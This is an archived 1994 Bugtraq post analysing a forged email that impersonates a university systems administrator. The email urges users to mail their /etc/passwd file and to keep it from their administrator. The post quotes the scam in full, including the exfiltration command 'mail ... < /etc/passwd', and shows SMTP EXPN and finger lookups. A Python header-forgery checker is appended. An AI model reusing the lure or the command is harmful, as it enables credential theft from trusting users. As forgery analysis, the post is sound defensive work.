Bugtraq mailing list archives

Stupid crackers exploiting stupid users


From: mouse () Collatz McRCIM McGill EDU (der Mouse)
Date: Sun, 23 Oct 1994 08:26:14 -0400


From: "Douglas R. Floyd" <dfloyd () paris eng utsa edu>
Message-Id: <9410230054.ZM10281 () paris eng utsa edu>
Date: Sun, 23 Oct 1994 00:54:14 -0500
To: bugtraq () crimelab com
Subject: Another request for passwords

I got this in the mail today (10-23).
Seems like someone is knocking on io.com now.

This appears to be a forged attempt to mailbomb someone else.  If you
read the headers carefully, you'll see that SFU appears in only the
From: header - the letter comes from helix.net and has a helix.net
Message-ID.  And when I looked at vanepp () sfu ca....

        [Thunder] 2> telnet whistler.sfu.ca smtp
        Trying 142.58.103.1 ...
        Connected to whistler.sfu.ca.
        Escape character is '^]'.
        220-whistler.sfu.ca Sendmail 8.6.8/SFU-2.6H ready at Sun, 23 Oct 1994 05:10:36 -0700
        220 ESMTP spoken here
        expn vanepp
        503 I demand that you introduce yourself first
(Hmmm, well, shrug-okay...)
        helo thunder.mcrcim.mcgill.edu
        250 whistler.sfu.ca Hello xxxx () xxxx xxxx xxxx [xxx.xxx.x.xx], pleased to meet you
        expn vanepp
        250 Peter Van Epp <vanepp () whistler sfu ca>
        quit
        221 whistler.sfu.ca closing connection
        Connection closed by foreign host.

Okay, Peter Van Epp exists.

        [Thunder] 3> finger vanepp () whistler sfu ca      
        [whistler.sfu.ca]
        X.500 Finger Service...
        One exact match found for "vanepp":
        "Peter Van Epp, Computing Services, Simon Fraser University"
          Also known as:   
                            Peter Van Epp
          Mailbox Information:
                            internet : vanepp () sfu ca
                            internet : peter_van_epp () sfu ca
          User Class:      
                            staff

Computing Services?  "staff"?  A staff person at SFU surely knows
better than to send out this piece of stupidity, especially since "expn
root" informs me that vanepp is one of nine people who get root's mail.

So I think someone on helix.net originated this, probably the person
responsible for the first piece of stupidity.  What vanepp has to do
with it I have trouble imagining; I would suspect that sfu.ca had been
cracked and vanepp's .forward file replaced to point to the real
culprit, but EXPN and VRFY on whistler's SMTP server don't give me that
impression.

I suppose it's _possible_ that Peter Van Epp _is_ the person
responsible and that the mail was forged from his account on helix.net,
but that seems extremely unlikely.

I'm sending a copy to root () sfu ca so that (a) vanepp probably gets it,
and (b) if vanepp's mail is being stolen somehow that I can't see
through VRFY and EXPN, the other roots there can deal with it.

For those who haven't yet seen it, here's the message as quoted by
dfloyd:

BEGIN FUNKY MESSAGE --------

From vanepp () sfu ca  Sun Oct 23 00:00:56 1994
Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
        (931110.SGI/930416.SGI.AUTO)
        for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
Received: from trance.helix.net
        by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
        id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
From: vanepp () sfu ca
Received: from  (helix.net [142.231.37.2]) by trance.helix.net
        (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
        dfloyd () pentagon io com; Sat, 22 Oct 1994 21:33:23 -0700
Message-Id: <199410230433.VAA07859 () trance helix net>
Date: Sat, 22 Oct 1994 14:22:25
To: dfloyd () pentagon io com
Subject: Very Important
Status: RO

Dear user,

    It is imperative that I attain your /etc/passwd file
immediately.  It is for security reasons.  You can mail
it to me by typing:

            mail vanepp () sfu ca < /etc/passwd

Do not tell your system administrator.  I am
conducting an investigation on your system.  Thank you

Your identity will be kept confidential.  I guarantee it

Thank you for your cooperation.

Peter Van Epp      Technical Systems Operations
                   CERT Security Advisor
                   vanepp () sfu ca


END FUNKY MESSAGE -----

                                        der Mouse

                            mouse () collatz mcrcim mcgill edu
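
The header comparison described in this post, as an added example that is not part of the original message: it parses the quoted headers, undoes the archive's "user () host tld" address masking, and reports whether the From: domain appears anywhere in the Message-Id or the Received chain. The function names and the two-label domain shortcut are assumptions of this example.

```python
import re
from email import message_from_string

# Headers of the quoted message as they appear in the post, including the
# archive's "user () host tld" address masking (undone by unmask() below).
RAW = """\
Received: from pentagon.io.com by paris.eng.utsa.edu via SMTP
 (931110.SGI/930416.SGI.AUTO)
 for dfloyd id AA05240; Sun, 23 Oct 94 00:00:56 -0500
Received: from trance.helix.net
 by pentagon.io.com (8.6.5/PERFORMIX-0.9/08-16-92)
 id XAA24822; Sat, 22 Oct 1994 23:31:04 -0500
From: vanepp () sfu ca
Received: from  (helix.net [142.231.37.2]) by trance.helix.net
 (8.6.9/Trance.helix.net 8.6.9) with SMTP id VAA07859 for
 dfloyd () pentagon io com; Sat, 22 Oct 1994 21:33:23 -0700
Message-Id: <199410230433.VAA07859 () trance helix net>
Date: Sat, 22 Oct 1994 14:22:25
To: dfloyd () pentagon io com
Subject: Very Important

"""

def unmask(text):
    """Turn the archive's 'user () host tld' back into 'user@host.tld'."""
    return re.sub(r"(\S+) \(\) ([\w-]+(?: [\w-]+)+)",
                  lambda m: m.group(1) + "@" + m.group(2).replace(" ", "."), text)

def org_domain(host):
    """Last two labels of a host name; enough for the hosts in this sample."""
    return ".".join(host.lower().strip("<> .").split(".")[-2:])

def analyse(raw):
    msg = message_from_string(unmask(raw))
    from_dom = org_domain(msg["From"].rsplit("@", 1)[1])
    msgid_dom = org_domain(msg["Message-Id"].rsplit("@", 1)[1])
    # Each relay prepends its Received header, so the last one is the earliest hop.
    hops = [" ".join(h.split()) for h in msg.get_all("Received")]
    path = [re.search(r"\bby (\S+)", h).group(1) for h in reversed(hops)]
    claimed_elsewhere = from_dom == msgid_dom or any(from_dom in h.lower() for h in hops)
    return {"from": from_dom, "message_id": msgid_dom, "path": path,
            "first_hop": org_domain(path[0]),
            # A lead for triage, not proof: legitimate mail can be relayed too.
            "from_only_in_from_header": not claimed_elsewhere}

if __name__ == "__main__":
    for key, value in analyse(RAW).items():
        print(f"{key}: {value}")
```

Only the Received lines written by relays you trust are reliable; anything below them is supplied by the sender and can be forged along with From:.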


